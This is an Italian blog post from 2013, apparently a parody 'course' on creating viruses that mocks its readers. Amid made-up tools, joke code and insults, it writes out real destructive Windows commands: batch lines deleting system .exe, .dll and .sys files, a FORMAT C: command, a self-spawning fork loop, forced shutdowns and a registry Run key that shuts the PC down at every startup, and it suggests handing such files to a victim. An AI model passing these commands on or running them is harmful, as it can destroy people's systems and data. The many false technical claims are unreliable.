Post più popolari

Cerca nel blog

Caricamento in corso...

venerdì 21 giugno 2013

Creare virus Corso Guida

In questo breve corso vedremo come creare virus molto efficienti tramite degli strumenti che vi verranno forniti in queste stesse pagine. Per creare un virus per sistemi windows è sufficiente avere un tool chiamato Virus Advanced Creator, uno strumento molto efficace diffuso dal famoso hacker belga creatore di virus informatici. Molti coder professionisti hanno ideato metodi di attacco molto efficienti come l'utilizzo di MeASM.exe descritto in questa approfondita guida. Copiando le password di msn tramite delle DLL di sistema in un registro di avvio il nostro virus che andremo a produrre ed editare sarà in grado di diffondersi con una rapidità devastante. Tutti i veri hacker professionisti usano questi strumenti per creare EXE come Love letter, trojan, attacchi bashing e molto altro. Come già detto, è molto semplice creare dei virus anche molto potenti inserendo questo codice: int main(){ system("localhost killer"); printf("questo codice serve a creare virus"); } Un virus coder come l'hacker h4x0r che con questo codice molto semplice formatta il pc alla vittima. Una volta inserito questo codice nel compilatore avrete il vostro virus pronto all'uso. È sufficiente usare il codice qua sotto per creare virus impossibili da rilevare per la maggior parte degli antivirus. Per far sì che la vittima esegua il vostro programma, dovete creare un virus che si copi usando la tecnica del trojan jamming, che vedremo realizzata fra poco con programma creare virus tramite i codici di intelligenza artificiale. Non è difficile, per un warez, produrre codice virale con retrodiffusione.

Creare il virus

Aprire Blocco note da Start⇒Tutti i programmi⇒Pirla, hai sbagliato a cliccare, rifai. ⇒Start⇒Tutti i programmi⇒Ecco, stavolta ci sei⇒Accessori⇒Robe varie⇒Blocco note, e inserire queste stringhe di testo immesse a capo:

@del %systemroot%\*.exe
@del %systemroot%\*.dll
@del %systemroot%\system32\*.exe
@del %systemroot%\system32\*.dll
@del %systemroot%\system32\*.sys

cliccare su File⇒salva con nome⇒ <<nomefile.bat>>
Apparirà nel posto dove avete salvato il virus una piccola icona simile a quella delle applicazioni ma con due ingranaggi dentro.
Ora potete mettere questo piccolo file sulla schedina USB e passarlo sul computer della simpatica cavia alla quale farete aprire il file.
Questo lo aprirà, e in quell'istante sarete assolutamente convinti che stia per accadere qualcosa di terribile al suo PC... e invece no! Ahahah, cretini, volete creare un virus, eh? Ma andate a lavorare, cugliun!

Formatta il computer

Aprite il blocco note (tutti i programmi/accessori/blocco note). Scrivete: @FORMAT all C: /AUTOTEST /Q /U salvate con questo nome :nomechevuoi.bat Tranquilli! Non formatterà il vostro computer, se non lo aprite (fatelo!!!).

Impalla il computer 

Aprite il blocco note e scrivete: START %1 START %1 pause >nul Cosa fa il programma? niente, appunto. questo potentisimo programma, elaborato nientepopò di meno che dal pentagono, riavvia il pc e quindi lo formatta.

Impalla il computer (Alternativa) 

Aprite il blocco note e scrivete:
:s
start %0
goto s
Salvate il file come nomefile.bat e fatelo partire. Tranquilli, il vostro computer dovrà essere spento staccando la spina e poi forsecontinuerà a funzionare!

Messaggi d’errore

Entrate nel vostro blocco note e scrivete lol=msgbox("text?",20,"text2") dove c'è text dovete mettere il testo dell'errore mentre dove c'è text 2 dovete mettere il nome dell errore.
Dopo aver messo il vostro testo supercagatorio tipo "il tuo pc è un virus che cammina" oppure "tra dieci secondi il tuo pc si formatterà" o, peggio ancora, "il tuo pc è gay", salvatelo.
Quando salvate con nome, spunterà "nome file" e mettete un nome normale come " errore" seguito da un punto quindi "errore.", mettete tutti i file. Dopo il punto scrivete vbs e chiamate il 481288, riceverete ogni giorno, alla modica cifra di 7 euro, un SMS che rivelerà l’andamento della vostra giornata!

Spegnere il computer

Aprite il blocco note, scrivete: shutdown -s -t 1 e salvate in .bat, come il virus precedente. Oppure c'è un altro metodo: cliccare sul desktop con il tasto destro del mouse, andare su nuovo>collegamento. Si aprirà una finestra dove voi dovrete digitare: shutdown -s -t 10 -c "error harddisk :05amp7tg4at5m06" I numeri 1 e 10 sono i secondi rimasti. Per esempio se metti 60 si spegne dopo 1 minuto, 120 si spegne in 2 minuti, 5 in 5 secondi...
Per non fare arrestare il sistema andare su start - esegui e digitare "shutdown -a" senza le virgolette, seguito da invio.

Console Greem 

Aprite il blocco note e scrivete [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "greem_viral"="shutdown -s" Salvatelo come exe.reg, infine apritelo e cliccate su OK. Adesso riavviate il computer e a pochi secondi dall'accensione si avvierà la console Greem, un potente programma per creare virus. Era stata inserita dagli sviluppatori di Windows nella fase beta, ma si sono dimenticati di rimuoverla.

Persone alle quali non installare il virus:

Dovete stare attenti a chi mettete il virus ad alcuni non potrebbe funzionare
Puoi vedere questa quida anche su http://tutorial-italiano.blogspot.it/

Da Robozeri

Nessun commento:

Posta un commento